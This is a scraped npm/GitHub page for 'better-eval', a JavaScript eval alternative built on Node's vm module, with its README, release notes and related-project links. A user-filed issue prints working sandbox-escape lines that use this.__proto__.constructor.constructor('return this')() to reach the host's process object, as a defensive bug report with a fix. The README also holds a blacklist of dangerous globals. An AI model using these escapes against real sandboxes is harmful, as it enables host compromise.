πŸ”§ Alternative to 'eval' in JavaScript that is customizable and safer!

Related tags

Learning resource javascript npm npm-package better eval
Overview

πŸ”§ better-eval

An alternative to eval() in JavaScript that is customizable and safer!

The eval function sucks, and there lacks alternatives that provide the same simplicity of the original eval function. better-eval solves this problem by adressing the security and speed issues, while delivering a sensible API.

better-eval - πŸ”§ An alternative to 'eval' that is just better! | Product Hunt

NPM Version NPM Version NPM Version

Why Better-Eval?

  • πŸ•Š Small and Lightweight.
  • ⚑ A simple and easy to use API.
  • πŸ› οΈ Easily customizable for your needs.
  • βœ… Tested and Mantained.

Installation

npm install better-eval

Usage

First, import the package:

const betterEval = require("better-eval");

Then call the function with something you want to be evaluated:

betterEval("1+1"); // returns 2

And its as simple as that! Any code will not be able to access variables you define unless explicitly passed.

Passing Variables

Include any variables as part of an object which you pass in as the second parameter:

const name = "Sam";

betterEval("`Hey ${name}`", { name }); // returns 'Hey Sam'

You can also pass functions as a part of the second parameter, and evaluate them in your code:

const returnName = () => "Bob";

betterEval("`Hey ${returnName()}`", { returnName }); // returns 'Hey Bob'

Blacklist

For your safety, any of these global variables on the blacklist will not be added to your variables:

  • global
  • process
  • module
  • require
  • document
  • window
  • Window
  • eval
  • Function

Here is how they will be handled:

betterEval("`Sum is ${eval('1+1')}`", { eval }); // eval is null!

Remember: never use better-eval blindly with user-code. These checks are precautions for your own usage, but any user with maltious intent could find a way to get through them. Thus, use this package with caution.

Configuring the VM

If you want to have more control over the VM that runs your code, you can pass in an vmOptions parameter:

betterEval(
  "1+1", {},
  {
    fileName: "counting",
    lineOffset: 1,
  }
);

A complete list of options can be found here.

License

better-eval is MIT-licensed open-source software created by Bharadwaj Duggaraju.

You might also like...

πŸ”‘ Keagate is an open-source, high-performance alternative to popular cryptocurrency payment gateways such as Coinbase Commerce, CoinGate, BitPay, NOWPayments, CoinRemitter, CoinsPaid and more.

πŸ”‘ Keagate is an open-source, high-performance alternative to popular cryptocurrency payment gateways such as Coinbase Commerce, CoinGate, BitPay, NOWPayments, CoinRemitter, CoinsPaid and more.

⛩️ Keagate – A High-Performance Cryptocurrency Payment Gateway 🚧 This project is actively in development 🚧 Table of Contents About the Project Purpo

Jan 3, 2023

Lumos is an AWS Lambda visualizer and open source alternative to AWS CloudWatch.

Lumos is an AWS Lambda visualizer and open source alternative to AWS CloudWatch.

Lumos Lambda Metrics Visualizer Table of Contents About Lumos Techologies Used Getting Started Key Lambda Metrics How to Contribute License Contributo

Nov 5, 2022

An alternative YouTube frontend built with Next.js, TailwindCSS, and TypeScript.

An alternative YouTube frontend built with Next.js, TailwindCSS, and TypeScript.

Invideo Invideo is an alternative YouTube frontend. Tools & Tech It's built with Next.js, TypeScript, and TailwindCSS. Where does Invideo get the data

Sep 22, 2022

BVSelect-VanillaJS - BVSelect - Vanilla Javascript Fully Customizable SelectBox

BVSelect-VanillaJS - BVSelect - Vanilla Javascript Fully Customizable SelectBox

BVSelect - Vanilla JS Replaces native select elements with fully customizable dropdowns. Demo: https://bmsvieira.github.io/BVSelect-VanillaJS/ Feature

Dec 26, 2022

The JavaScript library let’s you transform native tooltip’s into customizable overlays.

iTooltip The JavaScript library let’s you transform native tooltip’s into customizable overlays. Use: script src="/path/to/iTooltip.js"/script sc

Dec 17, 2021

An informal website of the alternative of KdB, an curriculum planning support system used in University of Tsukuba

alternative-tsukuba-kdb An informal website of the alternative of KdB, a curriculum planning support system used in University of Tsukuba. This reposi

Nov 25, 2022

A alternative to Github Copilot for vscode until you get the access to github copilot

A alternative to Github Copilot for vscode until you get the access to github copilot

Clara-Copilot πŸ†š Code Howdy πŸ‘‹ I know you guys are 😩 waiting for Github Copilot Here is a alternative one for now 😁 ⭐ Star is all i want nothing muc

Jan 8, 2023

A Fast & Light Virtual DOM Alternative

A Fast & Light Virtual DOM Alternative

hyper(HTML) πŸ“£ Community Announcement Please ask questions in the dedicated discussions repository, to help the community around this project grow β™₯ A

Dec 30, 2022

A JSDOM alternative with support for server side rendering of web components

A JSDOM alternative with support for server side rendering of web components

About A JSDOM alternative with support for server side rendering of web components. Happy DOM aim to support the most common functionality of a web br

Dec 30, 2022
Comments
  • Exploit due to the use of the Node std vm module

    Exploit due to the use of the Node std vm module

    Disclaimer: I might be understanding something wrong, but such an simple exploit should be avoided. In the README, it is claimed to be a safer alternative to eval

    BetterEval Version : 1.3.0 Node Version : 14.20.0 Operating System : Windows 10 & Linux Type : Obtaining the global object of the main context

    Exploit code:

    const betterEval = require("better-eval")

console.log(betterEval("this.__proto__.constructor.constructor('return this')().process"))
console.log(betterEval("this.__proto__.constructor.constructor('return this')()"))
console.log(betterEval("this.__proto__.constructor.constructor('return this')().eval"))
console.log(betterEval("this.__proto__.constructor.constructor('return this')().Function"))

    Ideas on how to fix it:

    • set the proto of this to null

    Implications of fix:

    • All from Object inhereted functions can't be used on this
    • They can be obtain by using ({})[function]
    • ({}).__proto__.constructor.constructor is not a function and thus can't be exploited
    • (()=>{}).constructor(.constructor, ...) always lives in the cleared context and can't be exploited either.

    Sorry for my bad english

    opened by FishingHacks 0
Releases(v1.3.0)

  • v1.3.0(Mar 13, 2022)

    v1.3.0

    It's been a while, but I decided to make some final changes to leave the codebase in top notch shape:

    • New logo.
    • New description - makes it clearer what better-eval is.
    • JS Doc fixes.

    πŸ₯‡Happy coding!

    Source code(tar.gz)
    Source code(zip)

  • v1.2.7(Feb 8, 2022)

    v1.2.7

    After a month of hard work, better-eval's development has come to an end.

    Changes in this release are minor documentation changes, and final test documentation.

    If there are any issues, feel free to leave them as I will still continue maintenance work as needed.

    But no new features will be added.

    πŸ’― Happy Coding.

    Source code(tar.gz)
    Source code(zip)

  • v1.2.6(Feb 7, 2022)

    v1.2.6

    The only reason I published this release was to emphasize that this package is to not be used blindly with user code. I don't want this package to be a security issue, and after getting some feedback, I wanted to get a warning release out as soon as possible. Anyways, hopefully this package still serves a purpose in the evaluation field, if not, feel free to leave an issue.

    πŸ’― Happy Coding!

    Source code(tar.gz)
    Source code(zip)

  • v1.2.5(Feb 4, 2022)

  • v1.2.4(Feb 4, 2022)

    v.1.2.4

    Changes in this release:

    • Documentation updates and typos.
    • Tests for all blacklisted variables.
    • HUGE: beginning of blacklisting variables for nested variables and other possible exploits.

    πŸ”’ Happy coding!

    Source code(tar.gz)
    Source code(zip)

  • 1.2.3(Feb 3, 2022)

    v.1.2.3

    Changes in this release:

    • Launch on product hunt & tag.
    • New section for blacklisted variables.
    • Refactor docs & make them easier to navigate.

    πŸ₯‡ Happy Coding!

    Source code(tar.gz)
    Source code(zip)

  • 1.2.2(Jan 28, 2022)

    v.1.2.2

    Here are some of the changes that occurred in this release:

    • More restrictions on unsafe functions.
    • Refactoring of code for easier development.
    • Retesting and typo fixes.

    πŸ’― Happy coding!

    Source code(tar.gz)
    Source code(zip)

  • 1.2.0(Jan 23, 2022)

    v.1.2.0

    Here are some of the changes that occurred in this release:

    • Some formatting fixes.
    • Documentation typo fixes.
    • Badges to indicate size.

    πŸ’― Happy coding!

    Source code(tar.gz)
    Source code(zip)

  • 1.1.9(Jan 20, 2022)

    v1.1.9

    First of all, sorry for the huge package version leap - I had some bugs with NPM, and this ended up being the only solution.

    With that out of the way, here are some changes that have been made:

    • Complete test coverage.
    • Scripts for developers.
    • Documentation fixes.
    • Some minor package improvements.

    Some new improvements for contributors should be coming soon, so be on the lookout for that. Happy coding!

    Source code(tar.gz)
    Source code(zip)

  • 1.0.9(Jan 17, 2022)

    v.1.0.9

    I'm very excited to be releasing the first tested and production ready version of better-eval! After around a week of work, hours of debugging, testing, and developing, I believe better-eval is a suitable option for evaluating code.

    Feel free to leave an issue in the issue tab, and if you want any changes to be made, a PR is much appreciated.

    πŸ’― Happy coding!

    Source code(tar.gz)
    Source code(zip)
Owner
Bharadwaj Duggaraju
web dev & open source
Bharadwaj Duggaraju
GitHub https://www.npmjs.com/package/better-eval
A maybe slightly safer-ish wrapper around eval Function constructors

evalish A maybe slightly safer-ish wrapper around eval Function constructors Please maybe try something else first.. Please. evalish is a small helper

0no.co 22 Aug 21, 2022
Mongo Strict is a TypeScript based smart MongoDB ORM, It makes the usage of MongoDB safer, easier and faster with a better performance...

mongo-strict mongo-strict is compatible with mongo >= 5 Mongo Strict is a TypeScript-based smart MongoDB ORM, It makes the usage of MongoDB safer, eas

Mohamed Kamel 4 Sep 22, 2022
Pure JavaScript HTML5 Canvas Range Slider. No stylesheet needed. Simple, elegant and powerful. A quirky alternative to other sliders.

CanvasSlider CanvasSlider is a lightweight JavaScript range slider. Most of the range slider controls use Javascript and a stylesheet. This slider use

null 7 Aug 15, 2022
Use Cloudflare Gateway DNS/VPN to block ads, malware and tracking domains - free alternative to NextDNS, Pi-hole and Adguard

Cloudflare Gateway Pi-hole Scripts (CGPS) Cloudflare Gateway allows you to create custom rules to filter HTTP, DNS, and network traffic based on your

null 70 Aug 13, 2023
A lightweight, modern and customizable JavaScript slider library.

NSlider NSlider is a lightweight (< 10 KB), modern and customizable JavaScript slider library. CDN Development https://cdn.jsdelivr.net/gh/fatihege/ns

Fatih 6 Jan 20, 2022
This simple library allows you to create awesome responsive and highly customizable popups importing just one JavaScript file.

Creativa - Popup This is a simple library that allows you to create awesome popups importing just one JavaScript file. Getting started You can import

Eduardo Mollo 5 Mar 29, 2022
A beautiful, responsive, highly customizable and accessible replacement for JavaScript's popup boxes. Zero dependencies.Alerts ,dialogs

AsgarAlert (v1) for JS Install <script defer src="/asgar-alert.js"></script> Examples The most basic message: asgar("Hello world!"); A message signali

Asgar Aliyev 5 Dec 20, 2022
GetOsLocalesCrossPlatform - A cross platform alternative to get locales used on the platform. Works on Node, Electron, NW.js and Browsers

getOsLocalesCrossPlatform A cross platform alternative to get locales used on the platform. Works on Node, Electron, NW.js and Browsers This script is

null 1 Jan 2, 2022
A container-friendly alternative to os.cpus().length. Both cgroups v1 and cgroups v2 are supported.

node-cpu-count A container-friendly alternative to os.cpus().length. Both cgroups v1 and cgroups v2 are supported. Installation $ npm install node-cpu

Jiahao Lu 2 Jan 17, 2022
(πŸ”—, 🌲) Web3 Link Tree is a free & open-source alternative to Linktree built with React.js, Next.js, Tailwind and Web3-React

Getting Started Read the detailed guide here Customize Add your name, wallet address, social media links and more in config.ts Images Save images to t

Naut 35 Sep 20, 2022